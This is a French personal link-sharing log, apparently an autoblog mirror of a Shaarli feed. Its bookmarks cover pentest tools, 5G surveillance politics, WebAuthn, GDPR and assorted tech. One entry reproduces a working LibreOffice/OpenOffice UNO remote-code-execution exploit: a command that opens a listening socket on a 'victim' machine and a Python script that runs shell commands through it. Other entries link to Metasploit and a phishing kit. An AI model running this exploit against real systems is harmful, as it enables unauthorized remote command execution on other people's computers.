PROJET AUTOBLOG


shaarli-Links

Site original : shaarli-Links

⇐ retour index

Msfconsole Commands - Metasploit Unleashed

2019-03-15T16:15:26+01:00

Permalink

Déploiement de la 5G : l'Allemagne victime collatérale du bras de fer opposant Huawei aux USA - Cyberguerre

2019-03-15T15:52:12+01:00
Alors, vous voulez la surveillance chinoise ou la surveillance américaine ?
Permalink

Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution

2019-03-15T14:43:24+01:00
# Utilisation de LibreOffice comme backdoor.

# Sur le PC victime
# ouvrir un serveur d'écoute qui interprète les commandes qu'on lui envoit :
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service' --invisible

# Sur le PC de contrôle :
```
import uno
from com.sun.star.system import XSystemShellExecute
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)

args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()

# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )

# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))
   
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("firefox", 'http://exemple.com',1)
```
Permalink

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

2019-03-15T11:02:27+01:00
https://www.exploit-db.com/searchsploit
# exemple :
searchsploit sftp
Permalink

Category:Metasploitable - charlesreid1

2019-03-15T10:16:09+01:00

Permalink

DARPA Is Building a $10 Million, Open Source, Secure Voting System - Motherboard

2019-03-15T09:44:21+01:00
à suivre
Permalink

GitHub - rapid7/metasploitable3: Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities.

2019-03-14T10:32:19+01:00

Permalink

DEEP DARK & ACID TECHNO MIX 2018 | MAKE ACID GREAT AGAIN - YouTube

2019-03-14T09:56:34+01:00
via https://www.nothing-is-3d.com/links/?2uh_yw
Permalink

GitHub - thelinuxchoice/blackeye: The most complete Phishing Tool, with 32 templates +1 customizable

2019-03-14T09:32:47+01:00
Quelqu'un a créé un outil de phishing qui copie 32 sites.
Permalink

ArchiveBox – Un clone d’Archive.org à héberger vous-même – Korben

2019-03-13T17:17:58+01:00
https://github.com/pirate/ArchiveBox
https://github.com/pirate/ArchiveBox/wiki/Usage
https://archive.sweeting.me/
Permalink

Désabonnez-moi ! | ploum.net

2019-03-12T14:35:37+01:00
Note :
«
Bonjour,

En vertu de la loi RGPD, pourriez-vous m’informer de la manière par laquelle vous avez obtenu mes coordonnées et effacer toutes données me concernant de vos différentes bases de données. Si vous les avez acquises, merci de me donner les coordonnées de votre fournisseur.

Bien à vous,
»

via https://sebsauvage.net/links/?kGupXg
Permalink

ffmpeg, la boite à outils multimédia - Documentation - Wiki - Linuxtricks

2019-03-10T14:09:52+01:00
via http://abel.antunes.free.fr/shaarli/index.php5?wnjmEA
Permalink

Extract Meta Data

2019-03-09T20:22:01+01:00

Permalink

5G et espionnage : la loi taillée contre Huawei avance malgré les critiques - Politique - Numerama

2019-03-08T16:04:36+01:00
Donc on pourra enfin bannir le matériel américain ? (Microsoft, Cisco Systems, DELL, HP, IBM,...)
^_^

Permalink

Solo – SoloKeys

2019-03-07T11:33:07+01:00
https://shop.solokeys.com/collections/frontpage/products/solo
https://solokeys.com/fr/start/
https://github.com/solokeys/solo-hw
https://github.com/solokeys/solo

https://www.generation-nt.com/connexion-sans-mot-passe-webauthn-w3c-standard-web-actualite-1962765.html
Permalink

Ghidra

2019-03-07T10:32:13+01:00
«A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission»

via https://pentesttools.net/nsa-releases-ghidra-9-0-free-powerful-reverse-engineering-tool/
Permalink

Web-Authentication · GitHub

2019-03-06T14:30:38+01:00
à étudier
https://www.generation-nt.com/connexion-sans-mot-passe-webauthn-w3c-standard-web-actualite-1962765.html
https://github.com/web-auth
https://webauthn.spomky-labs.com/
https://www.w3.org/TR/webauthn/
Permalink

Wardriving with Kismet, GPS and Google Earth. – Stealing the Network

2019-03-06T12:08:13+01:00
GPS : GlobalSat BU-353-S4 receiver
Permalink

Note: wifi on/off

2019-03-05T22:04:53+01:00
# on
modprobe cfg80211
modprobe brcmutil
modprobe brcmfmac

# off
/sbin/ifconfig wlan0 down
/bin/systemctl stop bluetooth
/bin/systemctl stop hciuart
rmmod brcmfmac
rmmod brcmutil
rmmod cfg80211

# cat /etc/modprobe.d/wifi-blacklist.conf
blacklist brcmfmac
blacklist brcmutil
blacklist cfg80211
blacklist rfkill
blacklist bnep
blacklist hci_uart
blacklist btbcm
blacklist bluetooth
Permalink

SPOILER alert, literally: Intel CPUs afflicted with simple data-spewing spec-exec vulnerability • The Register

2019-03-05T15:00:12+01:00
https://arxiv.org/pdf/1903.00446.pdf
Permalink